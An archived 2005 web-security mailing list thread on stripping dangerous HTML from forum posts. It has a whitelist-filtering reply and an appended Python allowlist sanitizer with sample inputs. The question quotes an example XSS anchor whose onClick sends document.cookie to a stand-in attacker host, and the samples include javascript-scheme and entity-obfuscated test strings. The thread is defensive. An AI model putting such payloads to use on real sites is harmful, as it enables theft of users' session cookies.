[WEB SECURITY] magic_quotes

dpw dainw at fsr.com
Fri Jun 24 11:18:41 EDT 2005


Pablo, I am working on a system right now for this, and based on excellent
recommendations from the fine people on this list, I have adopted a (mostly)
"whitelist" stance. The code I am writing splits the input at each "<" into
an array, and then evaluates each item. I have an array of "good" HTML tags
that I compare each item against, and if they don't match, I remove them
entirely. If they do match, then I process them through a filter that uses a
few regular expressions I cobbled together to search for things like
"script" or "&#x73&#x63&#x72&#x69&#x70&#x74". I have found a lot of useful
regular expression help at www.regexlib.com, and XSS exploit code to test
with at http://ha.ckers.org/xss.html. 


Good luck,
Dain White
Senior Developer - Webmaster
First Step Internet, L.L.C.
www.fsr.com | www.fsr.net


-----Original Message-----
From: Pablo Fernández [mailto:newsclient at teamq.info] 
Sent: Friday, June 24, 2005 7:29 AM
To: Dave King
Cc: websecurity at webappsec.org
Subject: Re: [WEB SECURITY] magic_quotes


Hi people

Do you happen to know of any library like the PHP Filter one but that is
able to strip *certain* HTML entities, i.e., I have a forum, people can
post using a WYSIWYG, so I want to allow stuff like <b> <i> <u> but I
really don't want to allow <iframe> <script>.

It just popped into my head: how do stable boards handle stuff like
onClick=""? I mean, do they manage <a href="#"
onClick="self.location.href='http://cookiestealer.dude/?'+document.cookie;">
and what about <a href="javascript:...."> ???

Ok, if you are aware of something like this, please, drop me a line

Thanks!

Best regards,
Pablo
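Added example, not Dain's code and not part of the PHP Filter library Pablo mentions: a small allowlist sanitizer in Python that covers both points raised in the thread. It keeps only the tags and attributes on a constructed allowlist, drops event-handler attributes such as onClick even when they sit on an otherwise permitted <a>, rejects href values whose scheme is not http/https/mailto after stripping entity- and whitespace-obfuscation, and re-escapes all text, so an entity-encoded sequence like the &#x73&#x63... one Dain greps for ends up as harmless text rather than markup. It uses Python's html.parser tokenizer instead of splitting on "<" because attributes (where onClick lives) are only reliably separated by a real tokenizer. The tag and attribute lists, the scheme set, the RAW_TEXT_TAGS set and the sample inputs are all constructed for this example; the dropped-item list exists so a board can log what was stripped from a post.

```python
import html
import re
from html.parser import HTMLParser

# Constructed allowlist for this example: tag -> attributes permitted on it.
# Anything not listed (iframe, script, img, onclick, style, ...) is dropped.
ALLOWED_TAGS = {
    "b": set(),
    "i": set(),
    "u": set(),
    "p": set(),
    "br": set(),
    "a": {"href", "title"},
}

# Only these URL schemes may appear in an href; "javascript:" is not among them.
SAFE_URL_SCHEMES = {"http", "https", "mailto"}

# Tags whose text content is discarded together with the tag itself.
RAW_TEXT_TAGS = {"script", "style"}


def safe_href(value):
    """Return a normalised href if its scheme is allowed, otherwise None.

    HTMLParser has already decoded entities in attribute values, so a value
    written as java&#x09;script: arrives here as 'java\\tscript:'. Control and
    whitespace characters are removed before the scheme check so that an
    obfuscated scheme is compared in its plain form.
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    match = re.match(r"([a-z][a-z0-9+.-]*):", cleaned, re.IGNORECASE)
    if match and match.group(1).lower() not in SAFE_URL_SCHEMES:
        return None
    return cleaned  # relative URLs, fragments and allowed schemes pass


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch, emitting only allowlisted markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []       # record of what was removed, for logging
        self._skipping = None   # set while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._skipping = tag
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag:{tag}")
            return
        parts = [tag]
        for name, value in attrs:   # HTMLParser lower-cases tag and attr names
            value = value or ""
            if name not in ALLOWED_TAGS[tag]:
                self.dropped.append(f"attr:{tag}.{name}")   # e.g. onclick
                continue
            if name == "href":
                value = safe_href(value)
                if value is None:
                    self.dropped.append(f"href:{tag}")
                    continue
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> is emitted as <br>

    def handle_endtag(self, tag):
        if tag == self._skipping:
            self._skipping = None
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skipping:
            return
        # Text is always re-escaped, so entity-encoded "script" is just text.
        self.out.append(html.escape(data, quote=False))

    # Comments, declarations and processing instructions are dropped because
    # the base class handlers for them do nothing.


def sanitize(fragment):
    """Return (clean_html, dropped_items) for an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample posts, including the onClick case raised in the thread.
    for sample in [
        '<b>hi</b> <script>alert(1)</script>',
        '<a href="#" onClick="alert(document.cookie)">click</a>',
        '<a href="java&#x09;script:alert(1)">x</a>',
        '<i>&#x73&#x63&#x72&#x69&#x70&#x74</i> 1 < 2',
        '<iframe src="http://example.invalid/"></iframe>text',
    ]:
        clean, dropped = sanitize(sample)
        print(repr(clean), dropped)
```

Because the output is rebuilt from the parsed tokens rather than edited in place, nothing the parser did not recognise as an allowed tag can reach the page, and the dropped list tells the board operator which posts carried event handlers or script-scheme links, which is a useful signal to keep in the forum's logs.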



---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
